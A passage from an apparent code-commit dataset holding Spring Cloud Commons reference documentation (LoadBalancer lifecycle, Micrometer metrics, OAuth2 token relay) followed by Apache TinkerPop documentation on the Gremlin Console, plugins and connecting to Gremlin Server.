T, RC> completionContext)` method. It contains the LoadBalancer `Response`, including the selected service instance, the `Status` of the request executed against that service instance, (if available) the response returned to the downstream client, and (if an exception has occurred) the corresponding `Throwable`.\n\nThe `supports(Class requestContextClass, Class responseClass,\nClass serverTypeClass)` method can be used to determine whether the processor in question handles objects of provided types.
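\n\nAs a rough sketch (the class name and the `Object` generic parameters here are illustrative, and the default `supports` implementation is relied upon), such a bean might look as follows:\n\n[source,java,indent=0]\n----\npublic class SketchLoadBalancerLifecycle implements LoadBalancerLifecycle<Object, Object, ServiceInstance> {\n\n\t@Override\n\tpublic void onStart(Request<Object> request) {\n\t\t\/\/ runs before an instance is selected; the request carries the data used for selection\n\t}\n\n\t@Override\n\tpublic void onStartRequest(Request<Object> request, Response<ServiceInstance> lbResponse) {\n\t\t\/\/ runs once an instance has been selected, before the call is executed against it\n\t}\n\n\t@Override\n\tpublic void onComplete(CompletionContext<Object, ServiceInstance, Object> completionContext) {\n\t\t\/\/ runs after the load-balanced call completes, with the Status and, if available, the response\n\t}\n}\n----\n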
If not overridden by the user, it returns `true`.\n\nNOTE: In the preceding method calls, `RC` means `RequestContext` type, `RES` means client response type, and `T` means returned server type.\n\n[[loadbalancer-micrometer-stats-lifecycle]]\n=== Spring Cloud LoadBalancer Statistics\n\nWe provide a `LoadBalancerLifecycle` bean called `MicrometerStatsLoadBalancerLifecycle`, which uses Micrometer to provide statistics for load-balanced calls.\n\nIn order to get this bean added to your application context,\nset the value of the `spring.cloud.loadbalancer.stats.micrometer.enabled` property to `true` and have a `MeterRegistry` available (for example, by adding https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/production-ready-features.html[Spring Boot Actuator] to your project).\n\n`MicrometerStatsLoadBalancerLifecycle` registers the following meters in `MeterRegistry`:\n\n* `loadbalancer.requests.active`: A gauge that allows you to monitor the number of currently active requests for any service instance (service instance data available via tags);\n* `loadbalancer.requests.success`: A timer that measures the time of execution of any load-balanced requests that have ended in passing a response on to the underlying client;\n* `loadbalancer.requests.failed`: A timer that measures the time of execution of any load-balanced requests that have ended with an exception;\n* `loadbalancer.requests.discard`: A counter that measures the number of discarded load-balanced requests, i.e. requests where a service instance to run the request on has not been retrieved by the LoadBalancer.\n\nAdditional information regarding the service instances, request data, and response data is added to metrics via tags whenever available.\n\nNOTE: For some implementations, such as `BlockingLoadBalancerClient`, request and response data might not be available, as we establish generic types from arguments and might not be able to determine the types and read the data.\n\nNOTE: The meters are registered in the registry when at least one record is added for a given meter.\n\nTIP: You can further configure the behavior of those metrics (for example, add https:\/\/micrometer.io\/docs\/concepts#_histograms_and_percentiles[publishing percentiles and histograms]) by https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/production-ready-features.html#production-ready-metrics-per-meter-properties[adding `MeterFilters`].\n\n== Spring Cloud Circuit Breaker\n\ninclude::spring-cloud-circuitbreaker.adoc[leveloffset=+1]\n\n== CachedRandomPropertySource\n\nSpring Cloud Context provides a `PropertySource` that caches random values based on a key. Outside of the caching\nfunctionality, it works the same as Spring Boot's https:\/\/github.com\/spring-projects\/spring-boot\/blob\/main\/spring-boot-project\/spring-boot\/src\/main\/java\/org\/springframework\/boot\/env\/RandomValuePropertySource.java[`RandomValuePropertySource`].\nThis random value might be useful in the case where you want a random value that is consistent even after the Spring Application\ncontext restarts. The property value takes the form of `cachedrandom.[yourkey].[type]`, where `yourkey` is the key in the cache.
The `type` value can\nbe any type supported by Spring Boot's `RandomValuePropertySource`.\n\n====\n[source,properties,indent=0]\n----\nmyrandom=${cachedrandom.appname.value}\n----\n====\n\n[[spring-cloud-security]]\n== Security\n\n[[spring-cloud-security-single-sign-on]]\n=== Single Sign On\n\nNOTE: All of the OAuth2 SSO and resource server features moved to Spring Boot\nin version 1.3. You can find documentation in the\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/[Spring Boot user guide].\n\n[[spring-cloud-security-client-token-relay]]\n==== Client Token Relay\n\nIf your app is a user-facing OAuth2 client (i.e. has declared\n`@EnableOAuth2Sso` or `@EnableOAuth2Client`) then it has an\n`OAuth2ClientContext` in request scope from Spring Boot. You can\ncreate your own `OAuth2RestTemplate` from this context and an\nautowired `OAuth2ProtectedResourceDetails`, and then the context will\nalways forward the access token downstream, also refreshing the access\ntoken automatically if it expires. (These are features of Spring\nSecurity and Spring Boot.)\n\n[[spring-cloud-security-resource-server-token-relay]]\n==== Resource Server Token Relay\n\nIf your app has `@EnableResourceServer`, you might want to relay the\nincoming token downstream to other services. If you use a\n`RestTemplate` to contact the downstream services, then this is just a\nmatter of how to create the template with the right context.\n\nIf your service uses `UserInfoTokenServices` to authenticate incoming\ntokens (i.e. it is using the `security.oauth2.user-info-uri`\nconfiguration), then you can simply create an `OAuth2RestTemplate`\nusing an autowired `OAuth2ClientContext` (it will be populated by the\nauthentication process before it hits the backend code). Equivalently\n(with Spring Boot 1.4), you could inject a\n`UserInfoRestTemplateFactory` and grab its `OAuth2RestTemplate` in\nyour configuration. For example:\n\n.MyConfiguration.java\n[source,java]\n----\n@Bean\npublic OAuth2RestTemplate restTemplate(UserInfoRestTemplateFactory factory) {\n return factory.getUserInfoRestTemplate();\n}\n----\n\nThis rest template will then have the same `OAuth2ClientContext`\n(request-scoped) that is used by the authentication filter, so you can\nuse it to send requests with the same access token.\n\nIf your app is not using `UserInfoTokenServices` but is still a client\n(i.e. it declares `@EnableOAuth2Client` or `@EnableOAuth2Sso`), then\nwith Spring Cloud Security any `OAuth2RestOperations` that the user\ncreates from an `@Autowired` `OAuth2ClientContext` will also forward\ntokens. This feature is implemented by default as an MVC handler\ninterceptor, so it only works in Spring MVC. If you are not using MVC,\nyou could use a custom filter or AOP interceptor wrapping an\n`AccessTokenContextRelay` to provide the same feature.\n\nHere's a basic\nexample showing the use of an autowired rest template created\nelsewhere (\"foo.com\" is a Resource Server accepting the same tokens as\nthe surrounding app):\n\n.MyController.java\n[source,java]\n----\n@Autowired\nprivate OAuth2RestOperations restTemplate;\n\n@RequestMapping(\"\/relay\")\npublic String relay() {\n ResponseEntity<String> response =\n restTemplate.getForEntity(\"https:\/\/foo.com\/bar\", String.class);\n return \"Success!
(\" + response.getBody() + \")\";\n}\n----\n\nIf you don't want to forward tokens (and that is a valid\nchoice, since you might want to act as yourself, rather than the\nclient that sent you the token), then you only need to create your own\n`OAuth2ClientContext` instead of autowiring the default one.\n\nFeign clients will also pick up an interceptor that uses the\n`OAuth2ClientContext` if it is available, so they should also do a\ntoken relay anywhere a `RestTemplate` would.\n\n== Configuration Properties\n\nTo see the list of all Spring Cloud Commons-related configuration properties, please check link:appendix.html[the Appendix page].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a27a04831fa7e43b26d23f14091b615a088eac83","subject":"fixed ssl.keyPassword description","message":"fixed ssl.keyPassword description\n","repos":"apache\/tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/incubator-tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,jorgebay\/tinkerpop,apache\/incubator-tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop","old_file":"docs\/src\/reference\/gremlin-applications.asciidoc","new_file":"docs\/src\/reference\/gremlin-applications.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n[[gremlin-applications]]\nGremlin Applications\n====================\n\nGremlin applications represent tools that are built on top of the core APIs to help expose common functionality to\nusers when working with graphs. There are two key applications:\n\n. Gremlin Console - A link:http:\/\/en.wikipedia.org\/wiki\/Read%E2%80%93eval%E2%80%93print_loop[REPL] environment for\ninteractive development and analysis\n. Gremlin Server - A server that hosts script engines thus enabling remote Gremlin execution\n\nimage:gremlin-lab-coat.png[width=310,float=left] Gremlin is designed to be extensible, making it possible for users\nand graph system\/language providers to customize it to their needs. Such extensibility is also found in the Gremlin\nConsole and Server, where a universal plugin system makes it possible to extend their capabilities.
One of the\nimportant aspects of the plugin system is the ability to help the user install the plugins through the command line,\nthus automating the process of gathering dependencies and other error-prone activities.\n\nThe process of plugin installation is handled by link:http:\/\/groovy.codehaus.org\/Grape[Grape], which helps resolve\ndependencies into the classpath. It is therefore important to ensure that Grape is properly configured in order to\nuse the automated capabilities of plugin installation. Grape is configured by `~\/.groovy\/grapeConfig.xml` and,\ngenerally speaking, if that file is not present, the default settings will suffice. However, they will not suffice\nif a required dependency is not in one of the default configured repositories. Please see the\nlink:http:\/\/groovy.codehaus.org\/Grape[Custom Ivy Settings] section of the Grape documentation for more details on\nthe defaults. TinkerPop recommends the following configuration in that file:\n\n[source,xml]\n<ivysettings>\n <settings defaultResolver=\"downloadGrapes\"\/>\n <resolvers>\n <chain name=\"downloadGrapes\">\n <filesystem name=\"cachedGrapes\">\n <ivy pattern=\"${user.home}\/.groovy\/grapes\/[organisation]\/[module]\/ivy-[revision].xml\"\/>\n <artifact pattern=\"${user.home}\/.groovy\/grapes\/[organisation]\/[module]\/[type]s\/[artifact]-[revision].[ext]\"\/>\n <\/filesystem>\n <ibiblio name=\"codehaus\" root=\"http:\/\/repository.codehaus.org\/\" m2compatible=\"true\"\/>\n <ibiblio name=\"central\" root=\"http:\/\/central.maven.org\/maven2\/\" m2compatible=\"true\"\/>\n <ibiblio name=\"jitpack\" root=\"https:\/\/jitpack.io\" m2compatible=\"true\"\/>\n <ibiblio name=\"java.net2\" root=\"http:\/\/download.java.net\/maven\/2\/\" m2compatible=\"true\"\/>\n <\/chain>\n <\/resolvers>\n<\/ivysettings>\n\nThe Grape configuration can also be modified to include the local system's Maven `.m2` directory by adding one or both\nof the following entries:\n\n[source,xml]\n<ibiblio name=\"apache-snapshots\" root=\"http:\/\/repository.apache.org\/snapshots\/\" m2compatible=\"true\"\/>\n<ibiblio name=\"local\" root=\"file:${user.home}\/.m2\/repository\/\" m2compatible=\"true\"\/>\n\nThese configurations are useful during development (i.e. if one is working with locally built artifacts) of TinkerPop\nPlugins. It is important to take note of the order used for these references, as Grape will check them in the order\nthey are specified. Depending on that order, an artifact other than the one expected may be used, which is typically\nan issue when working with SNAPSHOT dependencies.\n\nWARNING: If building TinkerPop from source, be sure to clear TinkerPop-related jars from the `~\/.groovy\/grapes`\ndirectory as they can become stale on some systems and not re-import properly from the local `.m2` after fresh rebuilds.\n\n[[gremlin-console]]\nGremlin Console\n---------------\n\nimage:gremlin-console.png[width=325,float=right] The Gremlin Console is an interactive terminal or\nlink:http:\/\/en.wikipedia.org\/wiki\/Read%E2%80%93eval%E2%80%93print_loop[REPL] that can be used to traverse graphs\nand interact with the data that they contain. It represents the most common method for performing ad-hoc graph\nanalysis, small to medium-sized data loading projects, and other exploratory functions. The Gremlin Console is\nhighly extensible, featuring a rich plugin system that allows new tools, commands,\nlink:http:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSLs], etc.
to be exposed to users.\n\nTo start the Gremlin Console, run `gremlin.sh` or `gremlin.bat`:\n\n[source,text]\n----\n$ bin\/gremlin.sh\n\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\nplugin loaded: tinkerpop.server\nplugin loaded: tinkerpop.utilities\nplugin loaded: tinkerpop.tinkergraph\ngremlin>\n----\n\nNOTE: If the above plugins are not loaded, then they will need to be enabled or else certain examples will not work.\nIf using the standard Gremlin Console distribution, then the plugins should be enabled by default. See below for\nmore information on the `:plugin use` command to manually enable plugins. These plugins, with the exception of\n`tinkerpop.tinkergraph`, cannot be removed from the Console as they are a part of the `gremlin-console.jar` itself.\nThese plugins can only be deactivated.\n\nThe Gremlin Console is loaded and ready for commands. Recall that the console hosts the Gremlin-Groovy language.\nPlease review link:http:\/\/groovy.codehaus.org\/[Groovy] for help on Groovy-related constructs. In short, Groovy is a\nsuperset of Java. What works in Java, works in Groovy. However, Groovy provides many shorthands to make it easier\nto interact with the Java API. Moreover, Gremlin provides many neat shorthands to make it easier to express paths\nthrough a property graph.\n\n[gremlin-groovy]\n----\ni = 'goodbye'\nj = 'self'\ni + \" \" + j\n\"${i} ${j}\"\n----\n\nThe \"toy\" graph provides a way to get started with Gremlin quickly.\n\n[gremlin-groovy]\n----\ng = TinkerFactory.createModern().traversal(standard())\ng.V()\ng.V().values('name')\ng.V().has('name','marko').out('knows').values('name')\n----\n\nTIP: When using Gremlin-Groovy in a Groovy class file, add `static { GremlinLoader.load() }` to the head of the file.\n\nConsole Commands\n~~~~~~~~~~~~~~~~\n\nIn addition to the standard commands of the link:http:\/\/groovy.codehaus.org\/Groovy+Shell[Groovy Shell], Gremlin adds\nsome other useful operations. The following table outlines the most commonly used commands:\n\n[width=\"100%\",cols=\"3,^2,10\",options=\"header\"]\n|=========================================================\n|Command |Alias |Description\n|:help |:? |Displays a list of commands and descriptions. When followed by a command name, it will display more specific help on that particular item.\n|:exit |:x |Ends the Console session.\n|import |:i |Import a class into the Console session.\n|:clear |:c |Sometimes the Console can get into a state where the command buffer no longer understands input (e.g. a misplaced `(` or `}`). Use this command to clear that buffer.\n|:load |:l |Load a file or URL into the command buffer for execution.\n|:install |:+ |Imports a Maven library and its dependencies into the Console.\n|:uninstall |:- |Removes a Maven library and its dependencies. A restart of the console is required for removal to fully take effect.\n|:plugin |:pin |Plugin management functions to list, activate and deactivate available plugins.\n|:remote |:rem |Configures a \"remote\" context where Gremlin or results of Gremlin will be processed via usage of `:submit`.\n|:submit |:> |Submit Gremlin to the currently active context defined by `:remote`.\n|=========================================================\n\nGremlin Console adds a special `max-iteration` preference that can be configured with the standard `:set` command\nfrom the Groovy Shell.
Use this setting to control the maximum number of results that the Console will display.\nConsider the following usage:\n\n[gremlin-groovy]\n----\n:set max-iteration 10\n(0..200)\n:set max-iteration 5\n(0..200)\n----\n\nIf this setting is not present, the console will default the maximum to 100 results.\n\nDependencies and Plugin Usage\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThe Gremlin Console can dynamically load external code libraries and make them available to the user. Furthermore,\nthose dependencies may contain Gremlin plugins, which can expand the language, provide useful functions, etc. These\nimportant console features are managed by the `:install` and `:plugin` commands.\n\nThe following Gremlin Console session demonstrates the basics of these features:\n\n[source,groovy]\n----\ngremlin> :plugin list <1>\n==>tinkerpop.server[active]\n==>tinkerpop.gephi\n==>tinkerpop.utilities[active]\n==>tinkerpop.sugar\n==>tinkerpop.tinkergraph[active]\ngremlin> :plugin use tinkerpop.sugar <2>\n==>tinkerpop.sugar activated\ngremlin> :install org.apache.tinkerpop neo4j-gremlin x.y.z <3>\n==>loaded: [org.apache.tinkerpop, neo4j-gremlin, x.y.z]\ngremlin> :plugin list <4>\n==>tinkerpop.server[active]\n==>tinkerpop.gephi\n==>tinkerpop.utilities[active]\n==>tinkerpop.sugar\n==>tinkerpop.tinkergraph[active]\n==>tinkerpop.neo4j\ngremlin> :plugin use tinkerpop.neo4j <5>\n==>tinkerpop.neo4j activated\ngremlin> :plugin list <6>\n==>tinkerpop.server[active]\n==>tinkerpop.gephi\n==>tinkerpop.sugar[active]\n==>tinkerpop.utilities[active]\n==>tinkerpop.neo4j[active]\n==>tinkerpop.tinkergraph[active]\n----\n\n<1> Show a list of \"available\" plugins. The list of \"available\" plugins is determined by the classes available on\nthe Console classpath. Plugins need to be \"active\" for their features to be available.\n<2> To make a plugin \"active\" execute the `:plugin use` command and specify the name of the plugin to enable.\n<3> Sometimes there are external dependencies that would be useful within the Console. To bring those in, execute\n`:install` and specify the Maven coordinates for the dependency.\n<4> Note that there is a \"tinkerpop.neo4j\" plugin available, but it is not yet \"active\".\n<5> Again, to use the \"tinkerpop.neo4j\" plugin, it must be made \"active\" with `:plugin use`.\n<6> Now when the plugin list is displayed, the \"tinkerpop.neo4j\" plugin is displayed as \"active\".\n\nWARNING: Plugins must be compatible with the version of the Gremlin Console (or Gremlin Server) being used. Attempts\nto use incompatible versions cannot be guaranteed to work. Moreover, be prepared for dependency conflicts in\nthird-party plugins, which may only be resolved via manual jar removal from the `ext\/{plugin}` directory.\n\nTIP: It is possible to manage plugin activation and deactivation by manually editing the `ext\/plugins.txt` file, which\ncontains the class names of the \"active\" plugins. It is also possible to clear dependencies added by `:install` by\ndeleting them from the `ext` directory.\n\nScript Executor\n~~~~~~~~~~~~~~~\n\nFor automated tasks and batch executions of Gremlin, it can be useful to execute Gremlin scripts from the command\nline. Consider the following file named `gremlin.groovy`:\n\n[source,groovy]\n----\nimport org.apache.tinkerpop.gremlin.tinkergraph.structure.*\ngraph = TinkerFactory.createModern()\ng = graph.traversal()\ng.V().each { println it }\n----\n\nThis script creates the toy graph and then iterates through all its vertices, printing each to the system out.
Note\nthat under this approach, \"imports\" need to be explicitly defined (except for \"core\" TinkerPop classes). In addition,\nplugins and other dependencies should already be \"installed\" via console commands, which cannot be used with this mode\nof execution. To execute this script from the command line, `gremlin.sh` has the `-e` option used as follows:\n\n[source,bash]\n----\n$ bin\/gremlin.sh -e gremlin.groovy\nv[1]\nv[2]\nv[3]\nv[4]\nv[5]\nv[6]\n----\n\nIt is also possible to pass arguments to scripts. Any parameters following the file name specification are treated\nas arguments to the script. They are collected into a list and passed in as a variable called \"args\". The following\nGremlin script is exactly like the previous one, but it makes use of the \"args\" option to filter the vertices printed\nto system out:\n\n[source,groovy]\n----\nimport org.apache.tinkerpop.gremlin.tinkergraph.structure.*\ngraph = TinkerFactory.createModern()\ng = graph.traversal()\ng.V().has('name',args[0]).each { println it }\n----\n\nWhen executed from the command line, a parameter can be supplied:\n\n[source,bash]\n----\n$ bin\/gremlin.sh -e gremlin.groovy marko\nv[1]\n$ bin\/gremlin.sh -e gremlin.groovy vadas\nv[2]\n----\n\nNOTE: The `ScriptExecutor` is for Gremlin Groovy scripts only. It is not possible to include Console plugin commands\nsuch as `:remote` or `:>` when using `-e` in these scripts. That does not mean that it is impossible to script such\ncommands; it just means that they need to be scripted manually. For example, instead of trying to use the `:remote`\ncommand, manually construct a <<connecting-via-java,Gremlin Driver>> `Client` and submit scripts from there.\n\n[[gremlin-server]]\nGremlin Server\n--------------\n\nimage:gremlin-server.png[width=400,float=right] Gremlin Server provides a way to remotely execute Gremlin scripts\nagainst one or more `Graph` instances hosted within it. The benefits of using Gremlin Server include:\n\n* Allows any Gremlin Structure-enabled graph to exist as a standalone server, which in turn enables the ability for\nmultiple clients to communicate with the same graph database.\n* Enables execution of ad-hoc queries through remotely submitted Gremlin scripts.\n* Allows for the hosting of Gremlin-based DSLs (Domain Specific Languages) that expand the Gremlin language to match\nthe language of the application domain, which will help support common graph use cases such as searching, ranking,\nand recommendation.\n* Provides a method for non-JVM languages (e.g. Python, JavaScript, etc.)
to communicate with the TinkerPop stack.\n* Exposes numerous methods for extension and customization to include serialization options, remote commands, etc.\n\nNOTE: Gremlin Server is the replacement for link:http:\/\/rexster.tinkerpop.com[Rexster].\n\nNOTE: Please see the link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/dev\/provider\/[Provider Documentation] for information\non how to develop a driver for Gremlin Server.\n\nBy default, communication with Gremlin Server occurs over link:http:\/\/en.wikipedia.org\/wiki\/WebSocket[WebSockets] and\nexposes a custom sub-protocol for interacting with the server.\n\n[[starting-gremlin-server]]\nStarting Gremlin Server\n~~~~~~~~~~~~~~~~~~~~~~~\n\nGremlin Server comes packaged with a script called `bin\/gremlin-server.sh` to get it started (use `gremlin-server.bat`\non Windows):\n\n[source,text]\n----\n$ bin\/gremlin-server.sh conf\/gremlin-server-modern.yaml\n[INFO] GremlinServer -\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-modern.yaml\n[INFO] MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics\n[INFO] Graphs - Graph [graph] was successfully configured via [conf\/tinkergraph-empty.properties].\n[INFO] ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*\n[INFO] ScriptEngines - Loaded gremlin-groovy ScriptEngine\n[INFO] GremlinExecutor - Initialized gremlin-groovy ScriptEngine with scripts\/generate-modern.groovy\n[INFO] ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.\n[INFO] ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[tinkergraph[vertices:0 edges:0], standard]\n[INFO] OpLoader - Adding the standard OpProcessor.\n[INFO] OpLoader - Adding the control OpProcessor.\n[INFO] OpLoader - Adding the session OpProcessor.\n[INFO] GremlinServer - Executing start up LifeCycleHook\n[INFO] Logger$info - Loading 'modern' graph data.\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v1.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v1.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nGremlin Server is configured by the provided link:http:\/\/www.yaml.org\/[YAML] file `conf\/gremlin-server-modern.yaml`.\nThat file tells Gremlin Server many things, such as:\n\n* The host and port to serve on\n* Thread pool sizes\n* Where to report metrics gathered by the server\n* The serializers to make available\n* The Gremlin `ScriptEngine` instances to expose and external dependencies to inject into them\n* `Graph` instances to expose\n\nThe log messages printed above show a number of things, but most importantly, there is a `Graph` instance named\n`graph` that is exposed in Gremlin Server. This graph is an in-memory TinkerGraph and was empty at the start of the\nserver. An initialization script at `scripts\/generate-modern.groovy` was executed during startup.

The log messages printed above show a number of things, but most importantly, there is a `Graph` instance named
`graph` that is exposed in Gremlin Server. This graph is an in-memory TinkerGraph and was empty at the start of the
server. An initialization script at `scripts/generate-modern.groovy` was executed during startup. Its contents are
as follows:

[source,groovy]
----
include::{basedir}/gremlin-server/scripts/generate-modern.groovy[]
----

The script above initializes a `Map` and assigns two key/value pairs to it. The first, assigned to "hook", defines a
`LifeCycleHook` for Gremlin Server. The "hook" provides a way to tie script code into the Gremlin Server startup and
shutdown sequences. The `LifeCycleHook` has two methods that can be implemented: `onStartUp` and `onShutDown`.
These events are called once at Gremlin Server start and once at Gremlin Server stop. This is an important point
because code outside of the "hook" is executed for each `ScriptEngine` creation (multiple may be created when
"sessions" are enabled) and therefore the `LifeCycleHook` provides a way to ensure that a script is only executed a
single time. In this case, the startup hook loads the "modern" graph into the empty TinkerGraph instance, preparing
it for use. The second key/value pair assigned to the `Map`, named "g", defines a `TraversalSource` from the `Graph`
bound to the "graph" variable in the YAML configuration file. This variable `g`, as well as any other variable
assigned to the `Map`, will be made available as variables for future remote script executions. In more general
terms, any key/value pairs assigned to a `Map` returned from the initialization script will become variables that
are global to all requests. In addition, any functions that are defined will be cached for future use.

WARNING: Transactions on graphs in initialization scripts are not closed automatically after the script finishes
executing. It is up to the script to properly commit or roll back transactions in the script itself.

[[connecting-via-console]]
Connecting via Console
~~~~~~~~~~~~~~~~~~~~~~

With Gremlin Server running it is now possible to issue some scripts to it for processing. Start Gremlin Console as
follows:

[source,text]
----
$ bin/gremlin.sh

       \,,,/
       (o o)
-----oOOo-(3)-oOOo-----
gremlin>
----

The console has the notion of a "remote", which represents a place a script will be sent from the console to be
evaluated elsewhere in some other context (e.g. Gremlin Server, Hadoop, etc.). To create a remote in the console,
do the following:

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote.yaml
----

The `:remote` command shown above displays the current status of the remote connection. This command can also be
used to configure a new connection and change other related settings. To actually send a script to the server a
different command is required:

[gremlin-groovy]
----
:> g.V().values('name')
:> g.V().has('name','marko').out('created').values('name')
:> g.E().label().groupCount()
result
:remote close
----

The `:>` command, which is a shorthand for `:submit`, sends the script to the server to execute there. Results are
wrapped in a `Result` object, which is just a holder for each individual result. The `class` shows the data type
for the containing value. Note that the last script sent was supposed to return a `Map`, but its `class` is
`java.lang.String`. By default, the connection is configured to only return text results. In other words,
Gremlin Server is using `toString` to serialize all results back to the console. This enables virtually any
object on the server to be returned to the console, but it doesn't allow the opportunity to work with this data
in any way in the console itself.
A different configuration of the `:remote` is required to get the results back
as "objects":

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote-objects.yaml <1>
:remote list <2>
:> g.E().label().groupCount() <3>
m = result[0].object <4>
m.sort {it.value}
script = """
       matthias = graph.addVertex('name','matthias')
       matthias.addEdge('co-creator',g.V().has('name','marko').next())
       """
:> @script <5>
:> g.V().has('name','matthias').out('co-creator').values('name')
:remote close
----

<1> This configuration file specifies that results should be deserialized back into an `Object` in the console with
the caveat being that the server and console both know how to serialize and deserialize the result to be returned.
<2> There are now two configured remote connections. The one marked by an asterisk is the one that was just created
and denotes the current one that `:submit` will react to.
<3> When the script is executed again, the `class` is no longer shown to be a `java.lang.String`. It is instead a `java.util.HashMap`.
<4> The last result of a remote script is always stored in the reserved variable `result`, which allows access to
the `Result` and by virtue of that, the `Map` itself.
<5> If the submission requires multiple lines to express, then a multi-line string can be created. The `:>` command
realizes that the user is referencing a variable via `@` and submits the string script.

TIP: In Groovy, `""" text """` is a convenient way to create a multi-line string and works well in concert with
`:> @variable`. Note that this model of submitting a string variable works for all `:>` based plugins, not just Gremlin Server.

WARNING: Not all values that can be returned from a Gremlin script end up being serializable. For example,
submitting `:> graph` will return a `Graph` instance and in most cases those are not serializable by Gremlin Server
and will return a serialization error. It should be noted that `TinkerGraph`, as a convenience for shipping around
small sub-graphs, is serializable from Gremlin Server.

The Gremlin Server `:remote config` command for the driver has the following configuration options:

[width="100%",cols="3,10a",options="header"]
|=========================================================
|Command |Description
|alias |
[width="100%",cols="3,10",options="header"]
!=========================================================
!Option !Description
! _pairs_ !A set of key/value alias/binding pairs to apply to requests.
!`reset` !Clears any aliases that were supplied in previous configurations of the remote.
!`show` !Shows the current set of aliases, which is returned as a `Map`.
!=========================================================
|timeout |Specifies the length of time in milliseconds the connection will wait for a response from the server. Specify "none" to
have no timeout. By default, this setting uses "none".
|=========================================================

[[console-aliases]]
Aliases
^^^^^^^

The `alias` configuration command for the Gremlin Server `:remote` can be useful in situations where there are
multiple `Graph` or `TraversalSource` instances on the server, as it becomes possible to rename them from the client
for purposes of execution within the context of a script. Therefore, it becomes possible to submit commands this way:

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote-objects.yaml
:remote config alias x g
:> x.E().label().groupCount()
----
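
The `reset` and `show` options from the configuration table above follow the same command pattern. A short sketch
(illustrative, not an exhaustive transcript):

[source,text]
----
:remote config alias show
:remote config alias reset
----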

[[console-sessions]]
Sessions
^^^^^^^^

A `:remote` created in the following fashion will be "sessionless", meaning each script issued to the server with
`:>` will be encased in a transaction and no state will be maintained from one request to the next.

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote-objects.yaml
----

In other words, the transaction will be automatically committed (or rolled back on error) and any variables declared
in that script will be forgotten for the next request. See the section on <<sessions, "Considering Sessions">>
for more information on that topic.

To enable the remote to connect with a session the `connect` argument takes another argument as follows:

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote.yaml session
:> x = 1
:> y = 2
:> x + y
----

With the above command a session gets created with a random UUID for a session identifier. It is also possible to
assign a custom session identifier by adding it as the last argument to the `:remote` command above. There is also the
option to replace "session" with "session-managed" to create a session that will auto-manage transactions (i.e. each
request will occur within the bounds of a transaction). In this way, the state of bound variables between requests is
maintained, but the transactional scope of the graph no longer needs to be managed manually.

[[console-remote-console]]
Remote Console
^^^^^^^^^^^^^^

Previous examples have shown usage of the `:>` command to send scripts to Gremlin Server. The Gremlin Console also
supports an additional method for doing this which can be more convenient when the intention is to exclusively
work with a remote connection to the server.

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote.yaml session
:remote console
x = 1
y = 2
x + y
:remote console
----

In the above example, the `:remote console` command is executed. It places the console in a state where the `:>` is
no longer required. Each script line is automatically submitted to Gremlin Server for evaluation. The
variables `x` and `y` that were defined don't actually exist locally - they only exist on the server! In this sense,
putting the console in this mode is basically like creating a window to a session on Gremlin Server.

TIP: When using `:remote console` there is not much point to using a configuration that uses a serializer that returns
actual data. In other words, using a configuration like the one inside of `conf/remote-objects.yaml` isn't typically
useful as in this mode the result will only ever be displayed but not used. Using a serializer configuration like
the one in `conf/remote.yaml` should perform better.

NOTE: Console commands (those that begin with a colon, e.g. `:x`, `:remote`) do not execute remotely when in this mode.
They are all still evaluated locally.

[[connecting-via-java]]
Connecting via Java
~~~~~~~~~~~~~~~~~~~

[source,xml]
----
<dependency>
